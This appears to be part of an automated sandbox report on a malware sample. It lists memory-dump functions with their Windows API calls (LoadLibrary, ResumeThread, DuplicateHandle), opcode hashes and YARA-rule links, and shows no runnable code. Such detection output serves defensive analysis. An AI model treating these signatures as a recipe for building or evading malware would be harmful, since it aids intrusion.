                                                • Opcode ID: 2fcb4a01bdef3649a325dd3b4f83c8bd07c54703b200e6e85d48d497c46b5a51
                                                • Instruction ID: b466225071bdc99b00716e708e7ecd604a093c5a6391308757fee68443597c0f
                                                • Opcode Fuzzy Hash: 2fcb4a01bdef3649a325dd3b4f83c8bd07c54703b200e6e85d48d497c46b5a51
                                                • Instruction Fuzzy Hash: 0E410371C10618CAEB24CFA9C884BCEBBF5BF89309F608069D409AB250DB756946CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A93CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02A95411
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 2f755dd2df11e41e4d47858557f9a851989c3ee34f3b9caee63f06359e460951
                                                • Instruction ID: ef2de9803975a4ebe10112a1889016c86d3d0be0d29c552bececb48a11b10b72
                                                • Opcode Fuzzy Hash: 2f755dd2df11e41e4d47858557f9a851989c3ee34f3b9caee63f06359e460951
                                                • Instruction Fuzzy Hash: 1D41E371C10728CBDF24CFA6C885B8EBBF5BF89309F608069D409AB251DB756946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0730960C, Relevance: 1.6, APIs: 1, Instructions: 92libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 073096E2
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 13b852ee9f5d6520c9adc1f3366381a52ebfd055d7731db3ff91399c0f687f21
                                                • Instruction ID: 79d73b9f28da90f3f0ae307249ca340d9232b52f2de1278ec175945eb25e00c8
                                                • Opcode Fuzzy Hash: 13b852ee9f5d6520c9adc1f3366381a52ebfd055d7731db3ff91399c0f687f21
                                                • Instruction Fuzzy Hash: 973147B5D103499FDB10CFA8C8A57DEBBF1BB08324F14812AE819A7390D779A445CF96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 073076D4, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 073096E2
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: c45da0e5d8904c238118f28fd0741daadfd5e5c75e2c9d72908a92dedd4d0952
                                                • Instruction ID: 220dbdeed187df13bca762cba3c8164d4b0583536d96d05dfc39cd735f36b633
                                                • Opcode Fuzzy Hash: c45da0e5d8904c238118f28fd0741daadfd5e5c75e2c9d72908a92dedd4d0952
                                                • Instruction Fuzzy Hash: D93145B5D102498FEB14CFA8C8A47DEBBF1BB08324F148129E819A7381D779A441CF96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9B8B2, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A9B93F
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 9532ee6e5815d7ffcf94e5a02e6d6d33673c172bab5b8db7f9896bd0afefef0a
                                                • Instruction ID: 5040d87990f29e740590e28a76c419a286bae22ed3131b6b98382b33e89ae01e
                                                • Opcode Fuzzy Hash: 9532ee6e5815d7ffcf94e5a02e6d6d33673c172bab5b8db7f9896bd0afefef0a
                                                • Instruction Fuzzy Hash: 1D21E3B5900219AFDB10CFAAD484ADEBBF8FB48324F14841AE914A7310D379A955CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A9B8B8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A9B93F
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 10ebfb8d86a8d3b72867a854175c9b09cff35c98a5cb3a52e1f6333ba75a88d4
                                                • Instruction ID: ddbcfb1a8862244da8f411e85b97beabcc1cb7d518deb875a36547def947da0c
                                                • Opcode Fuzzy Hash: 10ebfb8d86a8d3b72867a854175c9b09cff35c98a5cb3a52e1f6333ba75a88d4
                                                • Instruction Fuzzy Hash: 6721E4B59002199FDB10CFAAD484ADEBBF8FB48324F14841AE914A3310D378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A992A8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A99951,00000800,00000000,00000000), ref: 02A99B62
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: d8044a83c941fb46f93266d209d7be197551a2833210196ef83a196e390b043d
                                                • Instruction ID: 656ef0fd3dcfd1180aa26095367c692aea36e80cf045c89887ee3e2006d30cc9
                                                • Opcode Fuzzy Hash: d8044a83c941fb46f93266d209d7be197551a2833210196ef83a196e390b043d
                                                • Instruction Fuzzy Hash: B611F4B69003099BDB10CF9AC484ADEFBF4AB88324F10852ED915A7610C779A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A99AF1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A99951,00000800,00000000,00000000), ref: 02A99B62
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 3fa70becc4af7749061a200d8de074a83fa52dfff93896fffcd3b1adda03e11d
                                                • Instruction ID: c6496a4bb46703371dd0d42d2b02d631b64a6af8ffb9b97f129d53b213e23b7e
                                                • Opcode Fuzzy Hash: 3fa70becc4af7749061a200d8de074a83fa52dfff93896fffcd3b1adda03e11d
                                                • Instruction Fuzzy Hash: 2B1103B69003499FCB10CFAAC484AEEFBF4AB88324F14852ED915A7610C779A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 073098C8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.477012083.0000000007300000.00000040.00000001.sdmp, Offset: 07300000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2e0339b69be1aa5041d6e9dd9f766d43f4d555fdc5e22137f83a82156ca4f74f
                                                • Instruction ID: f5cee875ef564f2e8452d66a9b8a54594ce1a303d5eaa411641131537a268947
                                                • Opcode Fuzzy Hash: 2e0339b69be1aa5041d6e9dd9f766d43f4d555fdc5e22137f83a82156ca4f74f
                                                • Instruction Fuzzy Hash: 80113AB59003098BDB10DFAAC4447EEFBF4AB88324F14882DD519A7250C779A945CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BBFEA8, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 05BBFF0D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 423c31d8fa51f135adaef6c72609b419b8ff2b7576976c37d96384b2566f202a
                                                • Instruction ID: 96f27c924318baba1c5782934f80f1fba6049939bd2e82c947b5c79a3d964bad
                                                • Opcode Fuzzy Hash: 423c31d8fa51f135adaef6c72609b419b8ff2b7576976c37d96384b2566f202a
                                                • Instruction Fuzzy Hash: 931113B58007499FDB10CF99C884BEEBBF8FB49324F10855AE825A3250C3B4A554CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02A99870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02A998D6
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.467944771.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 08b87a4c921ce3cfcefebaae8a000e45fa798a28e05d35f4e8e5643e415cf5e1
                                                • Instruction ID: 612f90711ab8ab0904ea540be0778fbb7022fe0d28778d3b01503078c72e31a8
                                                • Opcode Fuzzy Hash: 08b87a4c921ce3cfcefebaae8a000e45fa798a28e05d35f4e8e5643e415cf5e1
                                                • Instruction Fuzzy Hash: 7611F0B5D002099BDB10CF9AC444ADEBBF4AB89324F14842ED829A7210C379A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05BBFEB0, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 05BBFF0D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.472191039.0000000005BB0000.00000040.00000001.sdmp, Offset: 05BB0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 16afceb72b42eb15456cd0459a5b8d05849bba0a00f12fbbf236d1126785ab34
                                                • Instruction ID: 472286871cd055fc9ac788fa03eea0af946cff2e1c8d14aedd78d0b445b00cdc
                                                • Opcode Fuzzy Hash: 16afceb72b42eb15456cd0459a5b8d05849bba0a00f12fbbf236d1126785ab34
                                                • Instruction Fuzzy Hash: 4F1103B58003499FDB10CF99C884BEEBBF8FB49324F108419E815A3210C3B9A544CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FC510, Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: cw
                                                • API String ID: 0-1686128743
                                                • Opcode ID: 69e053a52ef954cb856302d6acfda75e3a711aeb474f1af652840eea07692ba0
                                                • Instruction ID: 7f3f02eeeb508c62fe67865d2d3b5f8482928c3a7c620a80bf62e546442e1114
                                                • Opcode Fuzzy Hash: 69e053a52ef954cb856302d6acfda75e3a711aeb474f1af652840eea07692ba0
                                                • Instruction Fuzzy Hash: 6B6171747002098FDB14DF69D558AAEBBF2EF89314F148469E505EB3A1DB70DC45CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FBB78, Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: _
                                                • API String ID: 0-701932520
                                                • Opcode ID: ca66d5b85e049edec128fa4a4282438791c617553f83932a41eb1b293db92bc1
                                                • Instruction ID: f7dcb8a46d46463234e836c271c8c9063a43acf7609201eba79550bb18fe4b0c
                                                • Opcode Fuzzy Hash: ca66d5b85e049edec128fa4a4282438791c617553f83932a41eb1b293db92bc1
                                                • Instruction Fuzzy Hash: CB51E2727042099FCB12DF68E8548AFBBFAEF89311F14806AF619D7251DB31D811CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F2768, Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: fbfbd4ed8d84c288f0aeee7d6575093f6596b09e202fdf3901cd449dd31cb36f
                                                • Instruction ID: 5bf34653d5c003b842ea0aac7d46e29d0ce6b3f71b3b1e127a21d0f3edf7edc5
                                                • Opcode Fuzzy Hash: fbfbd4ed8d84c288f0aeee7d6575093f6596b09e202fdf3901cd449dd31cb36f
                                                • Instruction Fuzzy Hash: C3517FB5A002199FDB15CFA8C885AEEBBF5FF48310F148069EA15EB291DB34DD54CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF7C0, Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: de64692f8207ffe35c8d3c769a2f48de9e3a5cc4e34377b4a8b052a63cd0988d
                                                • Instruction ID: dcbff840fb8076cac9bf073942a0974e05b6269cb0a498f0ccb94d25dc74b430
                                                • Opcode Fuzzy Hash: de64692f8207ffe35c8d3c769a2f48de9e3a5cc4e34377b4a8b052a63cd0988d
                                                • Instruction Fuzzy Hash: 6241F1B8710200CFD718EB78E55676A37BAEB8930CF1144A9D216AB3D4DFB59C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF7D0, Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: 6722e70aade0dfb48d895ac2442a1bf6e1ef9b46fc2401edd581ba1cec675a24
                                                • Instruction ID: 136a844b8aea2f02197b4eb95760537ddefa9296abe665b7a0843743c4859005
                                                • Opcode Fuzzy Hash: 6722e70aade0dfb48d895ac2442a1bf6e1ef9b46fc2401edd581ba1cec675a24
                                                • Instruction Fuzzy Hash: B341E1B8710200CFDB18EB78E55676A33AAFB8930CF114468D216AB3D4DFB59C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF810, Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                • Opcode ID: d4318d7d74e22f5cdcfcea773f6f859bc42c1e544094fd63e0290f11a34b945f
                                                • Instruction ID: 8cef4ccfcc81d0a4cf7b1b12677ffdafcb4f1927c3f6293fe69bd5595abc423e
                                                • Opcode Fuzzy Hash: d4318d7d74e22f5cdcfcea773f6f859bc42c1e544094fd63e0290f11a34b945f
                                                • Instruction Fuzzy Hash: DA31C378710100CFD718EB68E55676A33AAFB8930CF1140A8D216AF7D5DF759C42CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F2757, Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 6e432b79b06a2e5c6a887ce55a238d3c3075ca3dc2825358806ca76d7fd8462b
                                                • Instruction ID: df0aaed51aca1cec2ded78d91add96579dde821ccea657005b6af5159465d8be
                                                • Opcode Fuzzy Hash: 6e432b79b06a2e5c6a887ce55a238d3c3075ca3dc2825358806ca76d7fd8462b
                                                • Instruction Fuzzy Hash: 97218372A002199FDB15CF65C885EEEBBF9FF49310F048129E915DB251DB34DA45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FDC68, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: "
                                                • API String ID: 0-123907689
                                                • Opcode ID: 034dfedd70e6666ef3b463c5e99f936ec68784a3d627da5dad781f6cccc6e95d
                                                • Instruction ID: 7f4fd781c7ff672908eb3591cc056c126607ea24a98c2bf9d75ac81a498901b3
                                                • Opcode Fuzzy Hash: 034dfedd70e6666ef3b463c5e99f936ec68784a3d627da5dad781f6cccc6e95d
                                                • Instruction Fuzzy Hash: 0F014771700209ABDB10DF65D840AAFFFFAEF81314F008929E144AB290D734EA0987E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FDC78, Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-3993045852
                                                • Opcode ID: f35390bbb72f6c058cdef17658b25b36e23c3031e54cb9c85443c9dbadb191c5
                                                • Instruction ID: 01514d167e04b1bf566be4262732f34f9e55660065fcf6b14e2fb57e225a20d0
                                                • Opcode Fuzzy Hash: f35390bbb72f6c058cdef17658b25b36e23c3031e54cb9c85443c9dbadb191c5
                                                • Instruction Fuzzy Hash: DD01D671B002199BCB10DF65E8409AFFFFAFF85354F008929E5949B290D770AA0987E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F3FD0, Relevance: .3, Instructions: 330COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45b41b4222202091dd1f25bb20d9961703d97c34dc46bb8107d4d5712edd8b1f
                                                • Instruction ID: a7ce6e5a8c3d79e22d8228777e92a86cedabea1ee819dad8b3d1436f2ee1d6ca
                                                • Opcode Fuzzy Hash: 45b41b4222202091dd1f25bb20d9961703d97c34dc46bb8107d4d5712edd8b1f
                                                • Instruction Fuzzy Hash: 96D15CB5A10245DFCB04DF68C4949AEBBF2FF88310F1585A9E9499B3A1DB30ED41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F0BD0, Relevance: .3, Instructions: 275COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 726a3c12aed8bd9cd34be828105d76342ec7c17164323b89b47510a044b96f24
                                                • Instruction ID: fa0e3a6842b49f3cbe9c224b1f737cd8f4f260d2e116cfcc1d2e3158bf34fb5c
                                                • Opcode Fuzzy Hash: 726a3c12aed8bd9cd34be828105d76342ec7c17164323b89b47510a044b96f24
                                                • Instruction Fuzzy Hash: 6BB19C70204345CFD721CF28D688B65BBE2AF48359F4984AAD5898F6E3D775F884CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FBD30, Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0493d437baab708a457fd3e0dc18117fd631edc2efb757d2b7bed0f0800ba4e
                                                • Instruction ID: d6e08adbac419da60949b9dc3b37bc02aeab986b9632585e456ed648f03b526c
                                                • Opcode Fuzzy Hash: d0493d437baab708a457fd3e0dc18117fd631edc2efb757d2b7bed0f0800ba4e
                                                • Instruction Fuzzy Hash: 5AA127B4618605DFCB16CF68C494969BBB2FF49311B16C496EA068B3A2C730ED81CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF471, Relevance: .2, Instructions: 151COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3794d660465eac2729b03f3d68adb4fd18406ba8b9911b54e24e8d2c4a38c173
                                                • Instruction ID: a3bb2470fedb6d037e2bd670bef2c9305e8e2646af93681ad80f42cdf1d2ed66
                                                • Opcode Fuzzy Hash: 3794d660465eac2729b03f3d68adb4fd18406ba8b9911b54e24e8d2c4a38c173
                                                • Instruction Fuzzy Hash: 5851D7F0914209CAEB04EF66D54979E7BBABB81308F11C459C121976C5DFF8834ADF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F5078, Relevance: .2, Instructions: 150COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00ee172ee575992adf85e26d36f982b01989e054f66f5048e156d11518f97b9c
                                                • Instruction ID: aa4632825799f2834d918d423150f8ad11ff4d3295d6e11f391316c2c9809814
                                                • Opcode Fuzzy Hash: 00ee172ee575992adf85e26d36f982b01989e054f66f5048e156d11518f97b9c
                                                • Instruction Fuzzy Hash: 3151C0B1A00745DFC705DF68C88499ABBF2FF89314B1589AAD0489B362DB30ED45CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FF480, Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b2332cec36de279f58e112cddb808cdec8ff7a53ceaa9ca13cfe2f4a7a2fb57
                                                • Instruction ID: 5a83f4c5b1def516aa16156198986ba43fc2d0fca01df8e5589353b21fe30b4a
                                                • Opcode Fuzzy Hash: 9b2332cec36de279f58e112cddb808cdec8ff7a53ceaa9ca13cfe2f4a7a2fb57
                                                • Instruction Fuzzy Hash: EE51F6F0924209CAEB04EF6AC54979E7BFABB81318F10C459C221976C5DFF8824ADF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F001D, Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47231ab164d40eaea5d8e0b5b1429674809be43b43f71c7a6f7e15623f1f2394
                                                • Instruction ID: 466e52f85c25c5029eefa9b8ab57ebf69632c322e585cbb325d1d8436d9bc823
                                                • Opcode Fuzzy Hash: 47231ab164d40eaea5d8e0b5b1429674809be43b43f71c7a6f7e15623f1f2394
                                                • Instruction Fuzzy Hash: 9C5139B5A007459FDB15CFA9C844A9EFFF2BF48310F158559E549AB3A2D770E881CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FC360, Relevance: .1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e266806cd9c53d8e0ca9e3ddb4c4d42beb7b0a9a1e4da230c0457359bbabc570
                                                • Instruction ID: 25025259b4f2ec01596ddc975033b0c9a6f0d621b3cdc2a5afce3c982d1e26df
                                                • Opcode Fuzzy Hash: e266806cd9c53d8e0ca9e3ddb4c4d42beb7b0a9a1e4da230c0457359bbabc570
                                                • Instruction Fuzzy Hash: D6519171A0421A9FCB12DF64C884EAEBBF2FF85320F158195E555DB2E1C770E940DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FED18, Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0ad479526776ca18104fa429082a58c18b501f8cc41c94a4313cf1295ec768e
                                                • Instruction ID: 2dc02b34b02ef6f1dbcb6f57594b1b47910578e8bdd8da051833bc5a37246e1c
                                                • Opcode Fuzzy Hash: f0ad479526776ca18104fa429082a58c18b501f8cc41c94a4313cf1295ec768e
                                                • Instruction Fuzzy Hash: CF4191B4324251CFCB4D9B34E164A6D3BB2FB8A2107450599E5179B3F2DF24ED09C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F50B0, Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c6b63de0a1f625d33d00ea8392533b1920c3213e336d0b6e1d31c5d694f164e
                                                • Instruction ID: cace8b2a3b218a29538de87a763b6876bb605ab715017dd8f78d5c8559a8cafb
                                                • Opcode Fuzzy Hash: 3c6b63de0a1f625d33d00ea8392533b1920c3213e336d0b6e1d31c5d694f164e
                                                • Instruction Fuzzy Hash: E4518BB5A00706DFC704DF68C48489ABBF2FF89314B1589A9D4499B362DB70FD86CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071F13D0, Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da1f20aa862ea1f897235628be3dc1534c9d3039a1ce184ddc70c848f21d7940
                                                • Instruction ID: 14d1463902dc6ec5affecee719fffa8520fd7af637fc936e3a8fe194adca0de5
                                                • Opcode Fuzzy Hash: da1f20aa862ea1f897235628be3dc1534c9d3039a1ce184ddc70c848f21d7940
                                                • Instruction Fuzzy Hash: E441EFB1608709EFD772CA25C088B6277F1EB86314F45499DD58383AE1D774F884E761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FE651, Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d3d7b18dcb690c330fff2d4a970ca121159499fbe4f1e75472e07ea22ea8898
                                                • Instruction ID: fd1379242d51809b19bc3ef2a6c22bc6a9a5d1c9e05f505450a9e074a80489fd
                                                • Opcode Fuzzy Hash: 6d3d7b18dcb690c330fff2d4a970ca121159499fbe4f1e75472e07ea22ea8898
                                                • Instruction Fuzzy Hash: F131382F109581CB8341E2A97450DD92F724569261344318FD6C8FFEB3EB248A9ED7F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071FD8F8, Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.476604092.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7b76f233e2bfb82c289384e29c0da00a7032925f2f5621960afa1c61c305c1f
                                                • Instruction ID: 70bf41ba8b5ecb884d70ef7b4d5abb4f8f37509af0c42b813db44984260b0d0c
                                                • Opcode Fuzzy Hash: a7b76f233e2bfb82c289384e29c0da00a7032925f2f5621960afa1c61c305c1f
                                                • Instruction Fuzzy Hash: F5412775304600CFC719CF69D4A8E2AB7F6FF89610B1545A9E68A8B7B6CB70EC41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

